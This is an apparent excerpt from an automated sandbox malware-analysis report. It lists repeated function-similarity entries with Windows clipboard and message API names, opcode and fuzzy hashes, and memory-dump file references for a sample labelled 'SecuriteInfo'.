                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 4b9b1ac82eac34430445c2309087bc685eefb6d24cca93d52ad6dff7770e3196
                            • Instruction ID: 8473ee2b4758d647dc0a94ee3611e9cb53faf8b8a555fad58fe14e57367caa1f
                            • Opcode Fuzzy Hash: 4b9b1ac82eac34430445c2309087bc685eefb6d24cca93d52ad6dff7770e3196
                            • Instruction Fuzzy Hash: 6AC1C03160474086EB678B27A4907EA7792F78DBD0F544212FB5A4BBF5DB78D881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: ClipboardCloseCountGlobalMessagePeekTickUnlock
                            • String ID:
                            • API String ID: 1792675829-0
                            • Opcode ID: 20a1fb2aa6619b2128788cb07f332ead3d4adfa78a5fd12a556c30ac19915eac
                            • Instruction ID: b7f7f3840a8aca7ed14f2ce3285260060ee85ac4e4305fae1ee52ae8becb0611
                            • Opcode Fuzzy Hash: 20a1fb2aa6619b2128788cb07f332ead3d4adfa78a5fd12a556c30ac19915eac
                            • Instruction Fuzzy Hash: A7C17E32205B4486EB6B8B27E8907EA37A1F74DBD0F544116EB5A4BBF5DB38C881C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 2a8032c0c8e8ec6c420dfd97f26bad5a03f4f58a1b7ad3aeb04a4cddee6ee341
                            • Instruction ID: f60f6f23d6e5d2b5788627842b4ec833d00f523fe85feed04d7fe58e04e7c6f5
                            • Opcode Fuzzy Hash: 2a8032c0c8e8ec6c420dfd97f26bad5a03f4f58a1b7ad3aeb04a4cddee6ee341
                            • Instruction Fuzzy Hash: D1A16E32604B4086FB6B8B27E8847EA37A2F78DBD4F544116EB594B6F5DB38C881C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$Window$ClipboardCloseForegroundGlobalIconicMessagePeekRectUnlock
                            • String ID:
                            • API String ID: 1613694844-0
                            • Opcode ID: 24405871700a497dfded6db317bef8a028d351ae20f8b2e295cfc653a6f94e68
                            • Instruction ID: 6e9c62cb7b95ed6cf880958df0dcf7c3dc5238f7105d27c5efe148ca8bfc2f58
                            • Opcode Fuzzy Hash: 24405871700a497dfded6db317bef8a028d351ae20f8b2e295cfc653a6f94e68
                            • Instruction Fuzzy Hash: 8FA14F3260574086EB6B8B27E8947EA77A1F74DBE4F140116EB5987BF5DB38C881C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: bcab57516af5449a16f489fadbc8afdd3f49c53b30938446aea660300bb9f69d
                            • Instruction ID: d320799438a0abed5ba18e568616cf065276be98bb6642134c5c2e36aa7840a4
                            • Opcode Fuzzy Hash: bcab57516af5449a16f489fadbc8afdd3f49c53b30938446aea660300bb9f69d
                            • Instruction Fuzzy Hash: 54A16036605B4486EB6B8B27E8807EA77A1F74DBD4F540116EB9947BF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 2bc0808c8186147f6e9ca6eb047ded2a360e9ad3c30c32fc6585e1211fc37546
                            • Instruction ID: c7f3e8fd837d06618d498678cc2e3abc4624add24a178d00e28c3d60e4f6fdde
                            • Opcode Fuzzy Hash: 2bc0808c8186147f6e9ca6eb047ded2a360e9ad3c30c32fc6585e1211fc37546
                            • Instruction Fuzzy Hash: B1A16E72205B4485EB6B8B2BE8847EA77A1FB4DBE4F144115EB99877F4DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 4251648c4b89d980894ab4cf8cf5d9bd2c4ddbd4d297c0a05384fb2ca86b939d
                            • Instruction ID: e9bc7b2cdaa75be8767f00fcc36e50b25b02f9f2829837594e3b7d69a3e0a3c5
                            • Opcode Fuzzy Hash: 4251648c4b89d980894ab4cf8cf5d9bd2c4ddbd4d297c0a05384fb2ca86b939d
                            • Instruction Fuzzy Hash: CBA16036605B4486EB678B27E8847EA77A1F74DBD4F540116EB9947BF4DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_errno_invalid_parameter_noinfo
                            • String ID:
                            • API String ID: 130734711-0
                            • Opcode ID: d9f7f49d87a709deb8f8a55dfe95421185815e2a73baa5c726ac3ae4d3c5f490
                            • Instruction ID: 725b58427b6ac51515aa6201e5a913ca1247c193efa9d6ca02caa1a9ee284997
                            • Opcode Fuzzy Hash: d9f7f49d87a709deb8f8a55dfe95421185815e2a73baa5c726ac3ae4d3c5f490
                            • Instruction Fuzzy Hash: F0A18F31205B4486FB6B9B27E8947EA27A2F74DBE4F540116FB5A47AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountMessageTick$ClipboardCloseGlobalPeekSendUnlock
                            • String ID:
                            • API String ID: 38145316-0
                            • Opcode ID: 1dc788a7215516a6033079bac0bb45f10942ad467b454f25580a0ee5531aa618
                            • Instruction ID: 47ac6356f597cb80ee23c6ba58f06828198a150173a253eaa842aaadea1f118e
                            • Opcode Fuzzy Hash: 1dc788a7215516a6033079bac0bb45f10942ad467b454f25580a0ee5531aa618
                            • Instruction Fuzzy Hash: 31A1603260574086FB6B8B27E8847EA77A2F74DBD4F540116EB5A87AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$free$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 2285768414-0
                            • Opcode ID: 2cc8900ef77a1c591c0c8babb454b4d27428e6ab8bde4d4d8607e296b2963534
                            • Instruction ID: fc41d4eea1aaaecc3104e62a637910e5feac394e24a0e194c34821f8d78b2d7b
                            • Opcode Fuzzy Hash: 2cc8900ef77a1c591c0c8babb454b4d27428e6ab8bde4d4d8607e296b2963534
                            • Instruction Fuzzy Hash: 89A17136605B4486EB678B27E8847EA37A1F74DBE4F140116EB9947BF4DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 7074a24cfa0307dd615133088044f34d4763f628f18b07a26f554998a33dda73
                            • Instruction ID: 0111a0aecfe22ec7373bb30d43c5708bc68b8a5e4a2d30972a9dadeb06a53691
                            • Opcode Fuzzy Hash: 7074a24cfa0307dd615133088044f34d4763f628f18b07a26f554998a33dda73
                            • Instruction Fuzzy Hash: C4A17036605B448AEB6B8B27E8843EA37A1F74DBE4F540116EB5947BF4DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 9d76ab5fefc3e9439cfd2a65452ed0845ca4b3e2da1c8f143c36626eb308627b
                            • Instruction ID: 4c46c5e3cf21e7805df779fec5096e27b104e47bf1492efcc39753d775f4f9fb
                            • Opcode Fuzzy Hash: 9d76ab5fefc3e9439cfd2a65452ed0845ca4b3e2da1c8f143c36626eb308627b
                            • Instruction Fuzzy Hash: DD919132205B4485FB6B8B27E8447EA77A1FB4DBE4F550116EB9947AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock_errno_invalid_parameter_noinfo
                            • String ID:
                            • API String ID: 130734711-0
                            • Opcode ID: ba7944bde02cccb331e17fbf8df54990b3a7181c61aa7eed86b4ed76e171274c
                            • Instruction ID: 00f8e0d076901313a91d13f4a4ea2fcbe85b9c60953cf2096a672152426afe4a
                            • Opcode Fuzzy Hash: ba7944bde02cccb331e17fbf8df54990b3a7181c61aa7eed86b4ed76e171274c
                            • Instruction Fuzzy Hash: 08A16132205B4086FB6B8B27E8847DA77A1F74DBE4F544216EB99876F5DB38C881C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 542e312c876e27fc5b23724b8d1b5eed6425b3bee1a73ca20922629a3329ea30
                            • Instruction ID: fdf79aefef8f4363ddb75b45a85edaefe523847fdb03b74e2473ff0d407583eb
                            • Opcode Fuzzy Hash: 542e312c876e27fc5b23724b8d1b5eed6425b3bee1a73ca20922629a3329ea30
                            • Instruction Fuzzy Hash: 01917032205B4486FB6B8B27E8847EA77A1F74DBE4F540116EB59876F5DB38C881C701
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: b8a625a1f4ad9f328f00606b4c27433ccf3a2b6efc09af7475048094053dd145
                            • Instruction ID: e164f54dc53b239856a512ca1f192fe1b34daf79bc8636490c32d9a482640a14
                            • Opcode Fuzzy Hash: b8a625a1f4ad9f328f00606b4c27433ccf3a2b6efc09af7475048094053dd145
                            • Instruction Fuzzy Hash: 9C917D32204B4486FB6B8B27E8447EA37A2F74DBE4F540116EB5987AF5DB38C881C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: 050a51655c139567fa7574dc0bdec20b7789bb56bccfa818d0e7d9af9c7b0942
                            • Instruction ID: 927671fa6e8873e40720bcfff860dfa4835a5c1fb427d0d0673797351c4d7c1e
                            • Opcode Fuzzy Hash: 050a51655c139567fa7574dc0bdec20b7789bb56bccfa818d0e7d9af9c7b0942
                            • Instruction Fuzzy Hash: F8917F32205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                            • String ID:
                            • API String ID: 1623861271-0
                            • Opcode ID: d4c103cc6dbb118a9dee737281c8368289f756bf5630a8248a7044edcee4af2b
                            • Instruction ID: 4798e12359d9e271c14237e760a047eeb21167eba458263e629e3c729099b6b9
                            • Opcode Fuzzy Hash: d4c103cc6dbb118a9dee737281c8368289f756bf5630a8248a7044edcee4af2b
                            • Instruction Fuzzy Hash: 6A917132205B4486FB6B8B27E8947EA37A1F74DBD4F580116EB59876F5DB38C880C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
